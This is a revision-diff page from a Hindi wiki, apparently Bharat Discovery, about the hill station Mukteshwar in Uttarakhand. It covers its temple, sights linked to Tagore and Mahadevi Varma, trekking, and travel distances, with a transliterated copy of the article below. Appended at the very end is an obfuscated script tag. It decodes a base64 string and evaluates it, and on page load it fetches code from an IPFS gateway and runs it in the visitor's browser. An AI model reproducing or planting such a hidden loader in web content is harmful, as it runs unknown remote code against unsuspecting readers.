Difference between revisions of "मुक्तेश्वर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 2: Line 2:
 
{{tocright}}
 
{{tocright}}
 
'''मुक्तेश्वर''' [[उत्तराखण्ड]] [[राज्य]] के [[नैनीताल]] में स्थित एक हिल स्टेशन है।  
 
'''मुक्तेश्वर''' [[उत्तराखण्ड]] [[राज्य]] के [[नैनीताल]] में स्थित एक हिल स्टेशन है।  
 +
==पर्यटन==
 +
[[कुमाऊँ]] क्षेत्र में बसे मुक्तेश्वर में [[शिव|भगवान शिव]] को समर्पित मुक्तेश्वर मंदिर है। यहाँ शिवलिंग सफेद संगमरमर से बना है। यहाँ से 250 मीटर दूर चौती जाली है। मान्यता है कि इसे छूने से महिलाएं माँ बन जाती हैं। 8 किलोमीटर दूर सोनापानी में कुमाऊँ की प्राकृतिक खूबसूरती को महसूस किया जा सकता है। 26 किलोमीटर की दूरी पर रामगढ़ है, जहाँ [[नोबेल पुरस्कार]] विजेता [[रवींद्रनाथ टैगोर]] ने 'गीतांजलि' लिखना शुरु किया था। यहाँ आप टैगोर प्वाइंट देख सकते हैं, जहाँ कभी टैगोर रहा करते थे। टैगोर प्वाइंट के नज़दीक ही गांव उमागढं में देवी स्थल है, जहाँ गर्मियों के मौसम में कवयित्री [[महादेवी वर्मा]] रहा करती थीं। यहाँ से नीलकंठ पर्वत की खूबसूरती को निहारा जा सकता है। नंदादेवी चोटी भी यहाँ से दिखती है। 
 +
==रोमांचक अनुभव==
 +
वाइल्डलाइफ में रुचि लेने वालों के लिए नाइट सफारे बेहद रोमांचक अनुभव रहता है। रात में जंगली बिल्ली, चीता आदि के क्रियाकलापों को देखना कम रोमांचक नहीं। यहाँ ट्रेकिंग और माउंटेन क्लाइंबिंग जैसे एडवेंचर स्पोर्ट्स भी आजमा सकते हैं। मुक्तेश्वर से करीब 7 किलोमीटर दूर लामहांगा जलप्रताप ट्रेकिंग के प्रेमियों की पहली पसंद है।
 
==यातायात और परिवहन==
 
==यातायात और परिवहन==
 
====वायु मार्ग====
 
====वायु मार्ग====
Line 9: Line 13:
 
====सड़क मार्ग====
 
====सड़क मार्ग====
 
मुक्तेश्वर सड़क मार्ग द्वारा [[दिल्ली]] से 353 किमी, नैनीताल से 51 और हल्दवानी से 42 किमी की दूरी पर स्थित है।
 
मुक्तेश्वर सड़क मार्ग द्वारा [[दिल्ली]] से 353 किमी, नैनीताल से 51 और हल्दवानी से 42 किमी की दूरी पर स्थित है।
==पर्यटन==
+
 
[[कुमाऊँ]] क्षेत्र में बसे मुक्तेश्वर में [[शिव|भगवान शिव]] को समर्पित मुक्तेश्वर मंदिर है। यहाँ शिवलिंग सफेद संगमरमर से बना है। यहाँ से 250 मीटर दूर चौती जाली है। मान्यता है कि इसे छूने से महिलाएं माँ बन जाती हैं। 8 किलोमीटर दूर सोनापानी में कुमाऊँ की प्राकृतिक खूबसूरती को महसूस किया जा सकता है। 26 किलोमीटर की दूरी पर रामगढ़ है, जहाँ [[नोबेल पुरस्कार]] विजेता [[रवींद्रनाथ टैगोर]] ने 'गीतांजलि' लिखना शुरु किया था। यहाँ आप टैगोर प्वाइंट देख सकते हैं, जहाँ कभी टैगोर रहा करते थे। टैगोर प्वाइंट के नज़दीक ही गांव उमागढं में देवी स्थल है, जहाँ गर्मियों के मौसम में कवयित्री [[महादेवी वर्मा]] रहा करती थीं। यहाँ से नीलकंठ पर्वत की खूबसूरती को निहारा जा सकता है। नंदादेवी चोटी भी यहाँ से दिखती है। 
 
==रोमांचक अनुभव==
 
वाइल्डलाइफ में रुचि लेने वालों के लिए नाइट सफारे बेहद रोमांचक अनुभव रहता है। रात में जंगली बिल्ली, चीता आदि के क्रियाकलापों को देखना कम रोमांचक नहीं। यहाँ ट्रेकिंग और माउंटेन क्लाइंबिंग जैसे एडवेंचर स्पोर्ट्स भी आजमा सकते हैं। मुक्तेश्वर से करीब 7 किलोमीटर दूर लामहांगा जलप्रताप ट्रेकिंग के प्रेमियों की पहली पसंद है।
 
  
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
Line 24: Line 25:
 
{{उत्तराखंड के पर्यटन स्थल}}
 
{{उत्तराखंड के पर्यटन स्थल}}
 
[[Category:उत्तराखंड]]
 
[[Category:उत्तराखंड]]
[[Category:उत्तराखंड के पर्यटन स्थल]]
 
 
[[Category:पर्यटन कोश]]
 
[[Category:पर्यटन कोश]]
 
[[Category:धार्मिक_स्थल_कोश]]
 
[[Category:धार्मिक_स्थल_कोश]]
 +
[[Category:उत्तराखंड के पर्यटन स्थल]]
 +
 
__INDEX__
 
__INDEX__

Revision as of 10:12, 8 December 2011

chitr:Icon-edit.gif is lekh ka punarikshan evan sampadan hona avashyak hai. ap isamean sahayata kar sakate haian. "sujhav"

mukteshvar uttarakhand rajy ke nainital mean sthit ek hil steshan hai.

paryatan

kumaooan kshetr mean base mukteshvar mean bhagavan shiv ko samarpit mukteshvar mandir hai. yahaan shivaliang saphed sangamaramar se bana hai. yahaan se 250 mitar door chauti jali hai. manyata hai ki ise chhoone se mahilaean maan ban jati haian. 8 kilomitar door sonapani mean kumaooan ki prakritik khoobasoorati ko mahasoos kiya ja sakata hai. 26 kilomitar ki doori par ramagadh hai, jahaan nobel puraskar vijeta raviandranath taigor ne 'gitaanjali' likhana shuru kiya tha. yahaan ap taigor pvaiant dekh sakate haian, jahaan kabhi taigor raha karate the. taigor pvaiant ke nazadik hi gaanv umagadhan mean devi sthal hai, jahaan garmiyoan ke mausam mean kavayitri mahadevi varma raha karati thian. yahaan se nilakanth parvat ki khoobasoorati ko nihara ja sakata hai. nandadevi choti bhi yahaan se dikhati hai.

romaanchak anubhav

vaildalaiph mean ruchi lene valoan ke lie nait saphare behad romaanchak anubhav rahata hai. rat mean jangali billi, chita adi ke kriyakalapoan ko dekhana kam romaanchak nahian. yahaan trekiang aur mauanten klaianbiang jaise edaveanchar sports bhi ajama sakate haian. mukteshvar se karib 7 kilomitar door lamahaanga jalapratap trekiang ke premiyoan ki pahali pasand hai.

yatayat aur parivahan

vayu marg

mukteshvar ka nazadiki havaee adde pantanagar havaee adde hai jo ki mukteshvar se 111 kimi ki doori par sthit hai.

rel marg

73 kimi ki doori par kathagodam relave steshan mukteshvar ka nazadiki relave steshan hai.

s dak marg

mukteshvar s dak marg dvara dilli se 353 kimi, nainital se 51 aur haldavani se 42 kimi ki doori par sthit hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh


bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>